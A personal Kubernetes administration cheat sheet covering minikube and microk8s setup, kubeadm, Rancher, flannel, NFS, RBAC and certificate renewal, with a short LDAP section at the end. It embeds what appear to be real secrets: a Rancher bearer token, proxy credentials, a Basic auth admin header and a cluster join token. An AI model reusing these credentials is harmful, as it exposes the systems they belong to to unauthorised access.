  7. Kubeproxy manages network traffic for the pods, including service discovery and load balancing. Kubeproxy is responsible for communication between pods that want to interact.


Lightweight Kubernetes distribution For resource-constrained environments ( IoT, Edge, Local-sandbox) Installation helpers:

  • K3D
  • k3sup
  • kubevip

microk8s

installation

sudo snap install microk8s --classic
sudo snap install microk8s --classic --edge 

enable addons

microk8s.start
microk8s.enable dns dashboard

check installation

microk8s.inspect

check journals for services

journalctl -u snap.microk8s.daemon-docker
  • snap.microk8s.daemon-apiserver
  • snap.microk8s.daemon-controller-manager
  • snap.microk8s.daemon-scheduler
  • snap.microk8s.daemon-kubelet
  • snap.microk8s.daemon-proxy
  • snap.microk8s.daemon-docker
  • snap.microk8s.daemon-etcd

minikube

installation from snap

sudo snap install minikube

installation from release

curl -Lo minikube https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 && chmod +x minikube
curl -Lo kubectl https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl && chmod +x kubectl

export MINIKUBE_WANTUPDATENOTIFICATION=false
export MINIKUBE_WANTREPORTERRORPROMPT=false
export MINIKUBE_HOME=$HOME
export CHANGE_MINIKUBE_NONE_USER=true
mkdir $HOME/.kube || true
touch $HOME/.kube/config

# defalue kubernetes config file location
export KUBECONFIG=$HOME/.kube/config
sudo -E ./minikube start --vm-driver=none

# wait that Minikube has created
for i in {1..150}; do # timeout for 5 minutes
   ./kubectl get po &> /dev/null
   if [ $? -ne 1 ]; then
      break
  fi
  sleep 2
done

set up env

minikube completion bash

start

minikube start

uninstall kube, uninstall kubectl, uninstall minikube

kubectl delete node --all
kubectl delete pods --all
kubectl stop
kubectl delete

launchctl stop '*kubelet*.mount'
launchctl stop localkube.service
launchctl disable localkube.service

sudo kubeadm reset
## network cleaining up 
# sudo ip link del cni0
# sudo ip link del flannel.1
# sudo systemctl restart network

rm -rf ~/.kube ~/.minikube
sudo rm -rf /usr/local/bin/localkube /usr/local/bin/minikube
sudo rm -rf /etc/kubernetes/

# sudo apt-get purge kubeadm kubectl kubelet kubernetes-cni kube*
sudo apt-get purge kube*
sudo apt-get autoremove

docker system prune -af --volumes

start without VirtualBox/KVM

export MINIKUBE_WANTUPDATENOTIFICATION=false
export MINIKUBE_WANTREPORTERRORPROMPT=false
export MINIKUBE_HOME=$HOME
export CHANGE_MINIKUBE_NONE_USER=true

export KUBECONFIG=$HOME/.kube/config
sudo -E minikube start --vm-driver=none

kubectl using minikube context

permanently

kubectl config use-context minikube

temporary

kubectl get pods --context=minikube

example of started kube processes

/usr/bin/kubelet 
    --bootstrap-kubeconfig=/etc/kubernetes/bootstrap-kubelet.conf 
    --kubeconfig=/etc/kubernetes/kubelet.conf 
    --config=/var/lib/kubelet/config.yaml 
    --cgroup-driver=cgroupfs 
    --cni-bin-dir=/opt/cni/bin 
    --cni-conf-dir=/etc/cni/net.d 
    --network-plugin=cni 
    --resolv-conf=/run/systemd/resolve/resolv.conf 
    --feature-gates=DevicePlugins=true

kube-apiserver 
    --authorization-mode=Node,RBAC 
    --advertise-address=10.143.226.20 
    --allow-privileged=true 
    --client-ca-file=/etc/kubernetes/pki/ca.crt 
    --disable-admission-plugins=PersistentVolumeLabel 
    --enable-admission-plugins=NodeRestriction 
    --enable-bootstrap-token-auth=true 
    --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt 
    --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key --etcd-servers=https://127.0.0.1:2379 --insecure-port=0 --kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt --kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname --proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt --proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key --requestheader-allowed-names=front-proxy-client --requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt --requestheader-extra-headers-prefix=X-Remote-Extra- --requestheader-group-headers=X-Remote-Group --requestheader-username-headers=X-Remote-User --secure-port=6443 --service-account-key-file=/etc/kubernetes/pki/sa.pub --service-cluster-ip-range=10.96.0.0/12 --tls-cert-file=/etc/kubernetes/pki/apiserver.crt --tls-private-key-file=/etc/kubernetes/pki/apiserver.key

kube-controller-manager
    --address=127.0.0.1
    --cluster-signing-cert-file=/etc/kubernetes/pki/ca.crt
    --cluster-signing-key-file=/etc/kubernetes/pki/ca.key
    --controllers=*,bootstrapsigner,tokencleaner
    --kubeconfig=/etc/kubernetes/controller-manager.conf
    --leader-elect=true
    --root-ca-file=/etc/kubernetes/pki/ca.crt
    --service-account-private-key-file=/etc/kubernetes/pki/sa.key
    --use-service-account-credentials=true

etcd
    --advertise-client-urls=https://127.0.0.1:2379
    --cert-file=/etc/kubernetes/pki/etcd/server.crt
    --client-cert-auth=true
    --data-dir=/var/lib/etcd
    --initial-advertise-peer-urls=https://127.0.0.1:2380
    --initial-cluster=gtxmachine0=https://127.0.0.1:2380
    --key-file=/etc/kubernetes/pki/etcd/server.key
    --listen-client-urls=https://127.0.0.1:2379
    --listen-peer-urls=https://127.0.0.1:2380
    --name=gtxmachine0
    --peer-cert-file=/etc/kubernetes/pki/etcd/peer.crt
    --peer-client-cert-auth=true
    --peer-key-file=/etc/kubernetes/pki/etcd/peer.key
    --peer-trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
    --snapshot-count=10000
    --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt

kube-scheduler 
    --address=127.0.0.1 
    --kubeconfig=/etc/kubernetes/scheduler.conf 
    --leader-elect=true

/usr/local/bin/kube-proxy 
    --config=/var/lib/kube-proxy/config.conf

/opt/bin/flanneld 
    --ip-masq 
    --kube-subnet-mgr

kubectl using different config file, kubectl config, different config kubectl

kubectl --kubeconfig=/home/user/.kube/config-student1 get pods

kubectl config with rancher, rancher with kubectl, rancher kubectl config

  • certificate-authority-data - from admin account
  • token - Bearer Token
apiVersion: v1
clusters:
- cluster:
    server: "https://10.14.22.20:9443/k8s/clusters/c-7w47z"
    certificate-authority-data: "....tLUVORCBDRVJUSUZJQ0FURS0tLS0t"
  name: "ev-cluster"

contexts:
- context:
    user: "ev-user"
    cluster: "ev-cluster"
  name: "ev-context"

current-context: "ev-context"

kind: Config
preferences: {}
users:
- name: "ev-user"
  user:  
    token: "token-6g4gv:lq4wbw4lmwtxkblmbbsbd7hc5j56v2ssjvfkxd"

update software

# check accessible list
sudo apt list | grep kube
# update system info
sudo apt-get update
# install one package
sudo apt-get install -y kubeadm=1.18.2-00
# FROM ubuntu:18
# environment
sudo apt install docker.io
sudo systemctl enable docker
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add
sudo apt install curl
# kube
sudo apt-add-repository "deb http://apt.kubernetes.io/ kubernetes-xenial main"
sudo apt install kubeadm
sudo swapoff -a
# init for using flannel ( check inside kube-flannel.yaml section net-conf.json/Network )
sudo kubeadm init --pod-network-cidr=10.244.0.0/16
rm -rf $HOME/.kube
mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config
# !!! install flannel ( or weave.... )
# kubectl get nodes

install via rancher

docker stop rancher
docker rm rancher

# -it --entrypoint="/bin/bash" \
docker run -d --restart=unless-stopped \
  --name rancher \
  -v /var/lib/rancher:/var/lib/rancher \
  -v /var/lib/rancher-log:/var/log \
  -p 9080:80 -p 9443:443 \
  -e HTTP_PROXY="http://qqml:mlfu\$[email protected]:8080" \
  -e HTTPS_PROXY="http://qqml:mlfu\$[email protected]:8080" \
  -e NO_PROXY="localhost,127.0.0.1,127.0.0.0/8,10.0.0.0/8,192.168.0.0/16" \
  rancher/rancher:latest

uninstall

cleanup node

# clean up for worker
## !!! most important !!!
sudo rm -rf /etc/cni/net.d

sudo rm -rf /opt/cni/bin
sudo rm -rf /var/lib/kubelet 
sudo rm -rf /var/lib/cni 
sudo rm -rf /etc/kubernetes
sudo rm -rf /run/calico 
sudo rm -rf /run/flannel 

sudo rm -rf /etc/ceph 
sudo rm -rf /opt/rke
sudo rm -rf /var/lib/calico 
sudo rm -rf /var/lib/etcd

sudo rm -rf /var/log/containers 
sudo rm -rf /var/log/pods 

# rancher full reset !!!
sudo rm -rf /var/lib/rancher/*
sudo rm -rf /var/lib/rancher-log/*

kube logs

### Master
## API Server, responsible for serving the API
/var/log/kube-apiserver.log 
## Scheduler, responsible for making scheduling decisions
/var/log/kube-scheduler.log
## Controller that manages replication controllers
/var/log/kube-controller-manager.log
### Worker Nodes
## Kubelet, responsible for running containers on the node
/var/log/kubelet.log
## Kube Proxy, responsible for service load balancing
/var/log/kube-proxy.log

kubernetes CLI

kubernetes version, k8s version

kubeadm version

one of the field will be like: GitVersion:"v1.11.1"

kustomize build config/default | kubectl apply -f-

kubectl template, inline code

sed "s|<NODE_INSTANCE_IP>|$NODE_1_IP|" eks-localstorage.yaml-template >  | kubectl apply -f -

access cluster

  • reverse proxy

    using for cache, security, load balancing ( forward proxy - just a 'proxy' ) activate proxy from current node

    kubectl proxy --port 9090
    # execute request against kubectl via reverse-proxy
    curl {current node ip}:9090/api
  • token access
    $TOKEN=$(kubectl describe secret $(kubectl get secrets | grep ^default | cut -f1 -d ' ') | grep -E '^token' | cut -f2 -d':' | tr -d " ")
    echo $TOKEN | tee token.crt
    echo "Authorization: Bearer "$TOKEN | tee token.header
    # execute from remote node against ( cat ~/.kube/config | grep server )
    curl https://{ip:port}/api --header @token.crt --insecure

connect to remote machine, rsh

# connect to remote machine
kubectl --namespace namespace-metrics --kubeconfig=config-rancher exec -ti sm-grafana-deployment-5bdb64-6dnb8 -- /bin/sh

copy from remote machine

# will fail if no `tar` in container !!!
kubectl --namespace "$KUBECONFIG_ENV" cp "$KUBECONFIG_ENV/$STREAM_POD_NAME:/deployment/app/cloud-application-kafka-streams*.jar" cloud-application-kafka-streams.jar

check namespaces

kubectl get namespaces

at least three namespaces will be provided

default       Active    15m
kube-public   Active    15m
kube-system   Active    15m

create namespace

kubectl create namespace my-own-namespace

or via yaml file

kubectl apply -f {filename}
kind: Namespace
apiVersion: v1
metadata:
  name: test

create limits for namespace

example for previous namespace declaration

apiVersion: v1
kind: LimitRange
metadata:
  name: my-own-namespace
spec:
  limits:
  - default:
      memory: 512Mi
    defaultRequest:
      memory: 256Mi
    type: Container

limits for certain container

apiVersion: v1
kind: Pod
metadata:
  name: frontend
spec:
  containers:
  - name: db
    image: mysql
    env:
    - name: MYSQL_ROOT_PASSWORD
      value: "password"
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"
        cpu: "500m"

also can be limited: pods, pv/pvc, services, configmaps...

print limits

kubectl get quota --namespace my-own-namespace
kubectl describe quota/compute-quota --namespace my-own-namespace
kubectl describe quota/object-quota --namespace my-own-namespace

kubectl describe {pod-name} limits 
kubectl describe {pod-name} limits --namespace my-own-namespace

delete namespace

kubectl delete namespace {name of namespace}

users

  • normal user
    • client certificates
    • bearer tokens
    • authentication proxy
    • http basic authentication
    • OpenId
  • service user
    • service account tokens
    • credentials using secrets
    • specific to namespace
    • created by objects
    • anonymous user ( not authenticated )

exeternal applications, user management, managing users

rbac

ps aux | grep kube-apiserver
# expected output
# --authorization-mode=Node,RBAC
# read existing roles 
kubectl get clusterRoles
# describe roles created by permission-management
kubectl describe clusterRoles/template-namespaced-resources___developer
kubectl describe clusterRoles/template-namespaced-resources___operation

# get all rolebindings
kubectl get RoleBinding --all-namespaces
kubectl get ClusterRoleBinding  --all-namespaces
kubectl get rolebindings.rbac.authorization.k8s.io --all-namespaces


# describe one of bindings
kubectl describe ClusterRoleBinding/student1___template-cluster-resources___read-only
kubectl describe rolebindings.rbac.authorization.k8s.io/student1___template-namespaced-resources___developer___students --namespace students 

Direct request to api, user management curl

TOKEN="Authorization: Basic YWRtaW46b2xnYSZ2aXRhbGlp"
curl -X GET -H "$TOKEN" http://localhost:4000/api/list-users

etcd

etcdctl installation

untar etcdctl from https://github.com/etcd-io/etcd/releases

etcd querying, etcd request key-values

docker exec -ti `docker ps | grep etcd | awk '{print $1}'` /bin/sh
etcdctl get / --prefix --keys-only
# etcdctl --endpoints=http://localhost:2379 get / --prefix --keys-only
etcdctl  get / --prefix --keys-only | grep permis
etcdctl  get /registry/namespaces/permission-manager -w=json

configuration, configmap

create configmap

example of configuration

color.ok=green
color.error=red
textmode=true
security.user.external.login_attempts=5

create configuration on cluster

kubectl create configmap my-config-file --from-env-file=/local/path/to/config.properties

will be created next configuration

...
data:
color.ok=green
color.error=red
textmode=true
security.user.external.login_attempts=5

or configuration with additional key, additional abstraction over the properties ( like Map of properties )

kubectl create configmap my-config-file --from-file=name-or-key-of-config=/local/path/to/config.properties

created file is:

data:
name-or-key-of-config:
    color.ok=green
    color.error=red
    textmode=true
    security.user.external.login_attempts=5

or configuration with additional key based on filename ( key will be a name of file )

kubectl create configmap my-config-file --from-file=/local/path/to/

created file is:

data:
config.properties:
    color.ok=green
    color.error=red
    textmode=true
    security.user.external.login_attempts=5

or inline creation

kubectl create configmap special-config --from-literal=color.ok=green --from-literal=color.error=red

get configurations, read configuration in specific format

kubectl get configmap 
kubectl get configmap --namespace kube-system 
kubectl get configmap --namespace kube-system kube-proxy --output json

using configuration, using of configmap

  • one variable from configmap
    spec:
      containers:
        - name: test-container
          image: k8s.gcr.io/busybox
          command: [ "/bin/sh", "echo $(MY_ENVIRONMENT_VARIABLE)" ]
          env:
            - name: MY_ENVIRONMENT_VARIABLE
              valueFrom:
                configMapKeyRef:
                  name: my-config-file
                  key: security.user.external.login_attempts
  • all variables from configmap
    ...
         envFrom:
         - configMapRef:
             name: my-config-file

cluster information

kubectl cluster-info
kubectl cluster-info dump

start readiness, check cluster

kubectl get node
kubectl get pods
minikube dashboard

addons

minikube addons list
minikube addons enable ingress

labels

show labels for each node

kubectl get nodes --show-labels

add label to Node

kubectl label nodes {node name} my_label=my_value

remove label from Node

kubectl label nodes {node name} my_label-

deployment

to see deployment from external world, remote access to pod, deployment access:
user ----> Route -----> Service ----> Deployment main schema

start dummy container

kubectl run hello-minikube --image=k8s.gcr.io/echoserver:1.4 --port=8080

start ubuntu and open shell

kubectl run --restart=Never --rm -it --image=ubuntu --limits='memory=123Mi' -- sh

create deployment ( with replica set )

kubectl run http --image=katacoda/docker-http-server:latest --replicas=1

scale deployment

scaling types

  • horizontal
  • vertical ( scaling up )

scaling example

deployment_name=my_deployment_name
## scale pod to amount of replicas
kubectl scale --replicas=3 deployment $deployment_name

## conditional scaling 
kubectl autoscale deployment $deployment_name --cpu-percent=50 --min=1 --max=3
# check Horizonal Pod Autoscaling
kubectl get hpa 

create from yaml file

kubectl create -f /path/to/controller.yml

create/update yaml file

kubectl apply -f /path/to/controller.yml

create service, expose service, inline service fastly

kubectl expose deployment helloworld-deployment --type=NodePort --name=helloworld-service
kubectl expose deployment helloworld-deployment --external-ip="172.17.0.13" --port=8000 --target-port=80

port forwarding, expose service

kubectl port-forward svc/my_service 8080 --namespace my_namespace

reach out service

minikube service helloworld-service
minikube service helloworld-service --url

service port range

kube-apiserver --service-node-port-range=30000-40000

describe resources, information about resources, inspect resources, inspect pod

kubectl describe deployment {name of deployment}
kubectl describe service {name of service}
kubectl describe pod {name of the pod}

describe secret, user token

kubectl --namespace kube-system describe secret admin-user

The operator reads information from external APIs (AWS Secrets Manager, HashiCorp Vault, Google Secrets Manager...)
and automatically injects the values into a Kubernetes Secret.

get resources

kubectl get all --all-namespaces
# check pod statuses 
kubectl get pods
kubectl get pods --namespace kube-system
kubectl get pods --show-labels
kubectl get pods --output=wide --selector="run=load-balancer-example" 
kubectl get pods --namespace training --field-selector="status.phase==Running,status.phase!=Unknown"
kubectl get service --output=wide
kubectl get service --output=wide --selector="app=helloworld"
kubectl get deployments
kubectl get replicasets
kubectl get nodes
kubectl get cronjobs
kubectl get daemonsets
kubectl get pods,deployments,services,rs,cm,pv,pvc -n demo

kubectl list services
kubectl describe service my_service_name

determinate cluster 'hostIP' to reach out application(s)

minikube ip

open 'kube-dns-....'/hostIP open 'kube-proxy-....'/hostIP

edit configuration of controller

kubectl edit pod hello-minikube-{some random hash}
kubectl edit deploy hello-minikube
kubectl edit ReplicationControllers helloworld-controller
kubectl set image deployment/helloworld-deployment {name of image}

rollout status

kubectl rollout status  deployment/helloworld-deployment

rollout history

kubectl rollout history  deployment/helloworld-deployment
kubectl rollout undo deployment/helloworld-deployment
kubectl rollout undo deployment/helloworld-deployment --to-revision={number of revision from 'history'}

delete running container

kubectl delete pod hello-minikube-6c47c66d8-td9p2

delete deployment

kubectl delete deploy hello-minikube

delete ReplicationController

kubectl delete rc helloworld-controller

delete PV/PVC

oc delete pvc/pvc-scenario-output-prod

port forwarding from local to pod/deployment/service

next receipts allow to redirect 127.0.0.1:8080 to pod:6379

kubectl port-forward redis-master-765d459796-258hz      8080:6379 
kubectl port-forward pods/redis-master-765d459796-258hz 8080:6379
kubectl port-forward deployment/redis-master            8080:6379 
kubectl port-forward rs/redis-master                    8080:6379 
kubectl port-forward svc/redis-master                   8080:6379

NodeSelector for certain host

spec:
   template:
      spec:
         nodeSelector: 
            kubernetes.io/hostname: gtxmachine1-ev

persistent volume

kind: PersistentVolume
apiVersion: v1
metadata:
  name: pv-volume3
  labels:
    type: local
spec:
  capacity:
    storage: 10Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/mnt/data3"

to access created volume

ls /mnt/data3

list of existing volumes

kubectl get pv 
kubectl get pvc

be aware about conception Init Container - any pod will be started only when all "init container(s)" will be finished properly

apiVersion: v1
kind: Pod
metadata:
  name: lifecycle-demo
spec:
  containers:
  - name: lifecycle-demo-container
    image: nginx
    lifecycle:
      postStart:
        exec:
          command: ["/bin/sh", "-c", "echo Hello from the postStart handler > /usr/share/message"]
      preStop:
        exec:
          command: ["/bin/sh","-c","nginx -s quit; while killall -0 nginx; do sleep 1; done"]
containers:
  - name: lifecycle
    image: busybox
    lifecycle:
      postStart:
        exec:
          command:
            - "touch"
            - "/var/log/lifecycle/post-start"
      preStop:
        httpGet:
          path: "/abort"
          port: 8080

Serverless

  • OpenFaas
  • Kubeless
  • Fission
  • OpenWhisk

deploy Pod on Node with label

apiVersion: v1
kind: Pod
metadata:
...
spec:
...
  nodeSelector:
    my_label=my_value

create Deployment for specific node

apiVersion: some-version
kind: Deployment
metadata:
...
spec:
...
  nodeSelector:
    my_label=my_value

resolving destination node

when label was not found

  • nodeAffinity
    • preferred - deploy in any case, with preferrence my_label=my_value
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: my_label
            operator: In
            values:
            - my_value
  • required - deploy only when label matched my_label=my_value
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: my_label
            operator: In
            values:
            - my_value
  • nodeAntiAffinity
spec:
  affinity:
    nodeAntiAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
  • podAffinity
    • preferred spec.affinity.podAffinity.preferredDuringSchedulingIgnoredDuringExecution
    • required spec.affinity.podAffinity.requiredDuringSchedulingIgnoredDuringExecution
  • podAntiAffinity
    • preferred spec.affinity.podAntiAffinity.preferredDuringSchedulingIgnoredDuringExecution
    • required spec.affinity.podAntiAffinity.requiredDuringSchedulingIgnoredDuringExecution

delete node from cluster

kubectl get nodes
kubectl delete {node name}

add node to cluster

ssh {master node}
kubeadm token create --print-join-command  --ttl 0

expected result from previous command

kubeadm join 10.14.26.210:6443 --token 7h0dmx.2v5oe1jwed --discovery-token-ca-cert-hash sha256:1d28ebf950316b8f3fdf680af5619ea2682707f2e966fc0

go to node, clean up and apply token

ssh {node address}
# hard way: rm -rf /etc/kubernetes
kubeadm reset
# apply token from previous step with additional flag: --ignore-preflight-errors=all
kubeadm join 10.14.26.210:6443 --token 7h0dmx.2v5oe1jwed --discovery-token-ca-cert-hash sha256:1d28ebf950316b8f3fdf680af5619ea2682707f2e966fc0 --ignore-preflight-errors=all

expected result from previous command

...
This node has joined the cluster:
* Certificate signing request was sent to master and a response
  was received.
* The Kubelet was informed of the new secure connection details.
 
Run 'kubectl get nodes' on the master to see this node join the cluster. 

next block is not mandatory in most cases

systemctl restart kubelet

logs

kubectl logs <name of pod>

create dashboard

kubectl create -f https://raw.githubusercontent.com/kubernetes/dashboard/master/aio/deploy/recommended/kubernetes-dashboard.yaml

access dashboard

kubectl -n kube-system describe secret admin-user
http://127.0.0.1:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/overview?namespace=default
kubectl proxy

common

execute command on specific pod

kubectl exec -it {name of a pod}  -- bash -c "echo hi > /path/to/output/test.txt" 

Extending

Weave

kubectl apply -f "https://cloud.weave.works/k8s/net?k8s-version=$(kubectl version | base64 | tr -d '\n')"

Flannel

deployment diagram restart nodes

# remove died pods
kubectl delete pods kube-flannel-ds-amd64-zsfz  --grace-period=0 --force
# delete all resources from file and ignore not found
kubectl delete -f --ignore-not-found https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml
kubectl create  -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml

install flannel

### apply this with possible issue with installation: 
## kube-flannel.yml": daemonsets.apps "kube-flannel-ds-s390x" is forbidden: User "system:node:name-of-my-server" cannot get daemonsets.apps in the namespace "kube-system"
# sudo kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/a70459be0084506e4ec919aa1c114638878db11b/Documentation/kube-flannel.yml

## Container runtime network not ready: NetworkReady=false reason:NetworkPluginNotReady message:docker: network plugin is not ready: cni config uninitialized
# sudo kubectl -n kube-system apply -f https://raw.githubusercontent.com/coreos/flannel/bc79dd1505b0c8681ece4de4c0d86c5cd2643275/Documentation/kube-flannel.yml

## print all logs
journalctl -f -u kubelet.service
# $KUBELET_NETWORK_ARGS in 
# /etc/systemd/system/kubelet.service.d/10-kubeadm.conf

## ideal way, not working properly in most cases
sudo kubectl -n kube-system apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml

## check installation 
ps aux | grep flannel
# root     13046  0.4  0.0 645968 24748 ?        Ssl  10:49   0:00 /opt/bin/flanneld --ip-masq --kube-subnet-mgr

ifconfig
cni0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 10.244.0.1  netmask 255.255.255.0  broadcast 0.0.0.0
flannel.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1450
        inet 10.244.0.0  netmask 255.255.255.255  broadcast 0.0.0.0

change settings and restart

kubectl edit cm kube-flannel-cfg -n kube-system
# net-conf.json: | { "Network": "10.244.0.0/16", "Backend": { "Type": "vxlan" } }

# Wipe current CNI network interfaces remaining the old network pool:
sudo ip link del cni0; sudo ip link del flannel.1

# Re-spawn Flannel and CoreDNS pods respectively:
kubectl delete pod --selector=app=flannel -n kube-system
kubectl delete pod --selector=k8s-app=kube-dns -n kube-system

# waiting for restart of all services

read logs

kubectl logs --namespace kube-system kube-flannel-ds-amd64-j4frw -c kube-flannel 

read logs from all pods

for each_node in $(kubectl get pods --namespace kube-system | grep flannel | awk '{print $1}');do echo $each_node;kubectl logs --namespace kube-system $each_node -c kube-flannel;done

read settings

kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp ls /etc/kube-flannel/
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /etc/kube-flannel/cni-conf.json
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /etc/kube-flannel/net-conf.json

kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp ls /run/flannel/
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /run/flannel/subnet.env

kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp ls /etc/cni/net.d
kubectl --namespace kube-system exec kube-flannel-ds-amd64-wc4zp cat /etc/cni/net.d/10-flannel.conflist

read DNS logs

kubectl get svc --namespace=kube-system | grep kube-dns
kubectl logs --namespace=kube-system coredns-78fcd94-7tlpw | tail

simple POD, dummy pod, waiting pod

kind: Pod
apiVersion: v1
metadata:
  name: sleep-dummy-pod
  namespace: students
spec:
  containers:
    - name: sleep-dummy-pod
      image: ubuntu
      command: ["/bin/bash", "-ec", "while :; do echo '.'; sleep 3600 ; done"]
  restartPolicy: Never

NFS ( Network File System )

nfs server

# nfs server 
vim /etc/exports
# /mnt/disks/k8s-local-storage/nfs        10.55.0.0/16(rw,sync,no_subtree_check)
# /mnt/disks/k8s-local-storage1/nfs       10.55.0.0/16(rw,sync,no_subtree_check)

sudo exportfs -a
sudo exportfs -v

systemctl status nfs-server
ll /sys/module/nfs/parameters/
ll /sys/module/nfsd/parameters/
sudo blkid
sudo vim /etc/fstab
# UUID=35c71cfa-6ee2-414a-5555-effc30555555 /mnt/disks/k8s-local-storage ext4 defaults 0 0
# UUID=42665716-1f89-44d4-5555-37b207555555 /mnt/disks/k8s-local-storage1 ext4 defaults 0 0
nfsstat

master. mount volume ( nfs server )

# create point 
sudo mkdir /mnt/disks/k8s-local-storage1
# mount 
sudo mount /dev/sdc /mnt/disks/k8s-local-storage1
sudo chmod 755 /mnt/disks/k8s-local-storage1
# createlink 
sudo ln -s /mnt/disks/k8s-local-storage1/nfs /mnt/nfs1
ls -la /mnt/disks
ls -la /mnt

# update storage
sudo cat /etc/exports
# /mnt/disks/k8s-local-storage1/nfs       10.55.0.0/16(rw,sync,no_subtree_check)

# restart 
sudo exportfs -a
sudo exportfs -v

nfs client

sudo blkid

sudo mkdir /mnt/nfs1
sudo chmod 777 /mnt/nfs1

sudo vim /etc/fstab
# add record
# 10.55.0.3:/mnt/disks/k8s-local-storage1/nfs /mnt/nfs1 nfs rw,noauto,x-systemd.automount,x-systemd.device-timeout=10,timeo=14 0 0
10.55.0.3:/mnt/disks/k8s-local-storage1/nfs /mnt/nfs1 nfs defaults 0 0

# refresh fstab
sudo mount -av

# for server 
ls /mnt/disks/k8s-local-storage
ls /mnt/disks/k8s-local-storage1

# for clients
ls /mnt/disks/k8s-local-storage1

trouble shooting, problem resolving

POD_NAME=service-coworking-postgresql-0

kubectl get pod $POD_NAME -o json
kubectl describe pod $POD_NAME

kubectl get --watch events
kubectl get events --sort-by=.metadata.creationTimestamp
kubectl get events --field-selector type=Warning
kubectl get events --field-selector type=Error
kubectl get events --field-selector type=Critical

kubectl get pvc data-service-coworking-postgresql-0 -o json

postgresql waiting for a volume to be created

create provider

kubectl get all -l app.kubernetes.io/name=aws-ebs-csi-driver -n kube-system

certificate is expired

bootstrap.go:195] Part of the existing bootstrap client certificate is expired: 2019-08-22 11:29:48 +0000 UTC

solution

sudo cat /etc/systemd/system/kubelet.service.d/10-kubeadm.conf

# archive configuration
sudo cp /etc/kubernetes/pki /etc/kubernetes/pki_backup
sudo mkdir /etc/kubernetes/conf_backup
sudo cp /etc/kubernetes/*.conf /etc/kubernetes/conf_backup

# remove certificates
sudo rm /etc/kubernetes/pki/./apiserver-kubelet-client.crt 
sudo rm /etc/kubernetes/pki/./etcd/healthcheck-client.crt 
sudo rm /etc/kubernetes/pki/./etcd/server.crt 
sudo rm /etc/kubernetes/pki/./etcd/peer.crt 
sudo rm /etc/kubernetes/pki/./etcd/ca.crt 
sudo rm /etc/kubernetes/pki/./front-proxy-client.crt 
sudo rm /etc/kubernetes/pki/./apiserver-etcd-client.crt 
sudo rm /etc/kubernetes/pki/./front-proxy-ca.crt 
sudo rm /etc/kubernetes/pki/./apiserver.crt 
sudo rm /etc/kubernetes/pki/./ca.crt 
sudo rm /etc/kubernetes/pki/apiserver.crt 
sudo rm /etc/kubernetes/pki/apiserver-etcd-client.crt 
sudo rm /etc/kubernetes/pki/apiserver-kubelet-client.crt 
sudo rm /etc/kubernetes/pki/ca.crt 
sudo rm /etc/kubernetes/pki/front-proxy-ca.crt 
sudo rm /etc/kubernetes/pki/front-proxy-client.crt 

# remove configurations
sudo rm /etc/kubernetes/apiserver-kubelet-client.*
sudo rm /etc/kubernetes/front-proxy-client.*
sudo rm /etc/kubernetes/etcd/*
sudo rm /etc/kubernetes/apiserver-etcd-client.*
sudo rm /etc/kubernetes/admin.conf
sudo rm /etc/kubernetes/controller-manager.conf
sudo rm /etc/kubernetes/kubelet.conf
sudo rm /etc/kubernetes/scheduler.conf

# re-init certificates
sudo kubeadm init phase certs all --apiserver-advertise-address {master ip address} --ignore-preflight-errors=all

# re-init configurations
sudo kubeadm init phase kubeconfig all --ignore-preflight-errors=all

# re-start
sudo systemctl stop kubectl.service
sudo systemctl restart docker.service
docker system prune -af --volumes
reboot

# /usr/bin/kubelet
sudo systemctl start kubectl.service

# init locate kubectl
sudo cp /etc/kubernetes/admin.conf ~/.kube/config

# check certificate
openssl x509 -in /etc/kubernetes/pki/apiserver.crt  -noout -text  | grep "Not After"

template frameworks

Troubleshooting

issue with PV / PVC

pod has unbound immediate PersistentVolumeClaims. preemption: 0/2 nodes are available: 2 No preemption victims found for incoming pod..

create - check PV & PVC capacities (requested space) - PVC should have not more than PV

LDAP cheat sheet

implementation

commands

whoami

ldapwhoami -x -v -H $LDAP_HOST -D $LDAP_USER -w $LDAP_PASSWORD
ldapwhoami -x -v -D "CN=Vitalii,OU=Users,OU=UBS,OU=Accounts,DC=vantage,DC=org" -H ldaps://ubsinfesv0015.vantage.org:636 -W
# CN - Common Name
# OU - Organizational Unit
# DC - Domain Component

perform user search

